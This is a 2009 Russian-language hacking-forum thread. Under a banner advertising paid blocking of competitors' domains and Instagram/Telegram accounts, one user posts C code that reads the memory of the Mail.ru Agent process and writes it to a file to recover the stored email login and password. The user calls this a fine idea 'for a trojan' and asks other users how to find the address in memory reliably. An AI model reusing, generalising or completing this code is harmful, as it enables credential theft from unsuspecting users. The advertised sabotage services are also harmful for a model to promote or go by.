УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Реально ли это?

Опции темы

Поиск в этой теме

Опции просмотра

Реально ли это?

10.04.2009, 03:27

Flenov

Участник форума

Регистрация: 22.11.2008

Сообщений: 142

Провел на форуме:
636446

Репутация: 32

Реально ли это?

Недавно наткнулся вот на это

Это рально или так очередной понт?

10.04.2009, 14:27

Karantin

Постоянный

Регистрация: 21.12.2007

Сообщений: 475

Провел на форуме:
1270580

Репутация: 387

Отправить сообщение для Karantin с помощью ICQ

2 года уже неактуально

10.04.2009, 19:56

Gar|k

Постоянный

Регистрация: 20.03.2009

Сообщений: 564

Провел на форуме:
991929

Репутация: 395

прикольная темка не буду создавать новой
спрошу свой вопрос

Делать мне нечего пытаюсь из памяти процесса маил агента выцепить данные о мыле и пароле. Посмотрел в оли дебаг и в артмани и выяснил что они где то тут 0x011B2000 - 0x011B3000 (до это выяснял как делать карту памяти процессов ниче полезного)

лано выяснил сделал!

Код:

	unsigned char *mem;
	DWORD st_addr=0x011B2000;
	HANDLE hProcess;
	HFILE f;

// эт моя фуекция через ToolHelp Process32First
if((thPID=GetPIDbyNameExe((char *)&szExE))==-1){ExitProcess(1); }

hProcess=OpenProcess(PROCESS_VM_READ,FALSE,thPID);

mem=(unsigned char *)LocalAlloc(LPTR,4096);

ReadProcessMemory(hProcess,(LPCVOID)st_addr,mem,4096,NULL);

f=_lcreat("d.txt", 0);
_lwrite(f,(LPCCH)mem,4096);
_lclose(f);

LocalFree(mem);
CloseHandle(hProcess);
ExitProcess(0);

ну запускаю смотрю файлик лежат логин пасс )

даю друзякам тестить хер... ну понятно адреса то разные

вопрос че делать???
я уже тут перечитал структуру PE заголовка научился выциплять образ exe из памяти )
делать карту памяти процесса .... но блин я хз в общем как артмани этот ищет какашко

а так тема же клевая особено в троянчек
из памяти прог цеплять данные крута.

10.04.2009, 23:47

0verbreaK

Постоянный

Регистрация: 30.04.2008

Сообщений: 323

Провел на форуме:
379101

Репутация: 136

Ну очевидно, что программа может
расположится в памяти по предпочтительному
адресупосмотри в ArtMoney, адрес
изменяется с каждым перезапуском агента!

11.04.2009, 02:56

Gar|k

Постоянный

Регистрация: 20.03.2009

Сообщений: 564

Провел на форуме:
991929

Репутация: 395

эммм типа вопрос как программно вычислить этот адресс
это понятно что он изменяется... как его находить ?

включать артмани смотреть и перекомпилировать не катит )

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Shell-аккаунт - что это?	zl0ba	Чужие Статьи	5	10.12.2006 01:35
С чего начинается достойный проект	ОТЕЦ	Чужие Статьи	2	28.09.2006 08:43
Небольшой отрывок от книги	T-REX	Болталка	0	19.10.2004 05:19

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход